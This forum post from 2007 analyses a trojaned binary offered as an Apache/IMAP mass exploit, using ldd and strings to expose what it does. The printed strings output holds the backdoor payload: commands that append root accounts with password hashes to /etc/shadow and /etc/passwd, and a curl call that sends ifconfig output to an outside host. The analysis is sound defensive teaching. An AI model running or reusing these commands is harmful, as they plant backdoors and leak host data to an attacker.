View Single Post
Old 08-28-07, 12:56 PM   #1
evilghost
Registered User
 
Join Date: Jul 2005
Posts: 3,606
Default Watch what you trust.

This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.

http://www.securityfocus.com/archive.../30/0/threaded

The grammatic structure of the message appears odd to say the least. Checking out the site there are two gzipped tarballs available for download. One includes the source code as well as a binary, the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root, you better know for darn sure what it is.

ldd will list libraries a dynamic executable is compiled against, in this case, the executable wasn't statically compiled.

Code:
luser@meowbox:~/Desktop$ ldd massxpl
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
        /lib/ld-linux.so.2 (0xb7f4f000)
Now, look what strings has to say:

Code:
luser@meowbox:~/Desktop$ strings massxpl
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
recv
connect
snprintf
fgets
puts
getuid
system
socket
select
send
strstr
bcopy
memset
gethostbyname
fclose
getpeername
htons
exit
fopen
_IO_stdin_used
__libc_start_main
fcntl
GLIBC_2.1
GLIBC_2.0
PTRh
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Host:%s
pache
IMAP4rev1
Root priviledge is needed - use your root user OK!
target.txt
Rename your target list filename to target.txt
/etc/shadow
newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d
As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/password file. It then connects to a HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor quality code. Several assumptions are made. Curl exists on the system and ifconfig will return a non IANA reserved address.

Either way, this should serve as a wake up call, malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking necessary caution you'll get owned.

Even if you don't know C read the source code, unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.
evilghost is offline   Reply With Quote